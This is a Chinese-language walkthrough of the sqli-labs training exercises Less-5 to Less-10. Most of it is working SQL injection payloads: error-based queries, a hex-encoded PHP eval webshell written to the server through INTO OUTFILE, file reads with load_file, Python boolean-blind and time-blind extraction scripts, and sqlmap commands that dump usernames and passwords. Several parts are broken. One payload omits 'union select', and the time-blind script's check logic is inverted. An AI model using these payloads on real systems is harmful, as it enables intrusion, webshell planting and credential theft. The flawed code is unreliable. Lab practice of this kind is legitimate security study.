$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);
if($row) { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; } else { echo '<font size="3" color="#FFFF00">'; print_r(mysql_error()); echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; }} else { echo "Please input the ID as parameter with numeric value";}
但是会把错误的信息给打印出来
该注入原理可以查找资料,注入方式的有资料[1]可以点击查看,如下只列举常遇到的十种报错注入的方式
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* 运用
http://localhost/sqlilabs2/Less-5/index.php?id=-1' union select 1,count(*),concat((floor(rand(0)*2)),'--',(select concat(id,'-',username,'-',password) from security.users limit 0,1))x from information_schema.tables group by x%23
* 使用注意
- payload是在中间concat部分,修改该部分可以执行不同命令
- 只能用concat连接 ,group_concat不行,且每次只能显示一条数据
- 要让上述的报错实现,数据库至少要3条数据
* 使用注意
- MySQL 5.1.5版本以上才支持该函数
- 返回的数据限制为32位
- 可以用substring函数进行数据位移偏转
http://localhost/sqlilabs2/Less-5/index.php?id=-1' and (extractvalue(1,concat(0x7e,(select substring(group_concat(username),1) from users),0x7e)))--+
http://localhost/sqlilabs2/Less-5/index.php?id=-1' and (updatexml(1,concat(0x7e,(select SUBSTRING(group_concat(username),12) from users),0x7e),1))--+
* 使用注意
- MySQL 5.1.5版本以上才支持该函数
- 返回的数据限制为32位
- 可以用substring函数进行数据位移偏转
和第五关类似,只要用双引号闭合即可
http://127.0.0.1/sqlilabs2/Less-6/index.php?id=-1" union select 1,count(*),concat((floor(rand(0)*2)),'--',(select concat(id,'-',username,'-',password) from security.users limit 0,1))x from information_schema.tables group by x%23
直接上payload(第五六题均可用)
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-5/index.php?id=1" --technique E -D security -T users --dump --batch
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result); if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; } else { echo '<font color= "#FFFF00">'; echo 'You have an error in your SQL syntax'; //print_r(mysql_error()); echo "</font>"; }} else { echo "Please input the ID as parameter with numeric value";}
secure-file-priv- 如果文件导入不成功,确认Mysql配置文件my.ini下存在secure-file-priv - secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的
mysql使用以下命令查看是否打开文件写入开关
show global variables like '%secure%'
修改my.ini添加secure-file-priv参数,没有填具体值表示不做限制(这样做其实很危险)
重启mysql即可
写入一句话木马
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=-1')) union select 1,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\mm2.php"--+
写入phpinfo
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1')) 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\pp2.php--+
写入需要注意的
可以在文件目录查看发现文件写入成功
同时网页可以直接访问该文件并执行
http://127.0.0.1/sqlilabs2/Less-3/index.php?id=-1') union select 1,load_file('e:\mm.php'),3--+
文件读取
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-1/index.php?id=1" --file-read "E:\mm.php"
文件写入
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1" --file-write "/home/bb/1.txt" --file-dest "E:\sql2.php" --batch
import stringimport requestsfrom time import sleep
arlist = string.printable
Baseurl = "http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1\' and "
def checkurl(url): res = requests.get(url) if res.ok: if 'You are in' in res.text: return True return False
def main(): flag = '' for g in range(100): for i in arlist: payload = "substr((select group_concat(username,password) from users),%s,1) = \'%s\'--+" % ( g, i) finalurl = Baseurl + payload if checkurl(finalurl): flag = flag + str(i) print(flag) sleep(0.2)
if __name__ == "__main__": main()
直接上payload
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1" --technique B -D security -T users -C username,password --dump --threads 10 --batch
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);
if($row) { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; } else { echo '<font size="5" color="#FFFF00">'; //echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; }} else { echo "Please input the ID as parameter with numeric value";}
?>
时间盲注源码如下
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);
if($row) { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; } else { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; //print_r(mysql_error()); //echo "You have an error in your SQL syntax"; echo "</br></font>"; echo '<font color= "#0000ff" font size= 3>'; }} else { echo "Please input the ID as parameter with numeric value";}
import stringimport requestsfrom time import sleep
arlist = string.printable
Baseurl = "http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1\' and "
def checkurl(url): try: res = requests.get(url,timeout = 3) return True except Exception as e: return False
def main(): flag = '' for g in range(100): for i in arlist: payload = "if((substr((select group_concat(username,password) from users),%s,1) = \'%s\'),sleep(5),1)--+" % ( g, i) finalurl = Baseurl + payload if checkurl(finalurl): flag = flag + str(i) print(flag) sleep(0.2)
if __name__ == "__main__": main()
payload:
http://127.0.0.1/sqlilabs2/Less-10/index.php?id=1" and if((length(database())=8),sleep(5),1)--+
直接上payload(9-10通用)
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1" --technique T -D security -T users -C username,password --dump --threads 10 --batch
[1]
资料: https://www.cnblogs.com/csyxf/p/10241456.html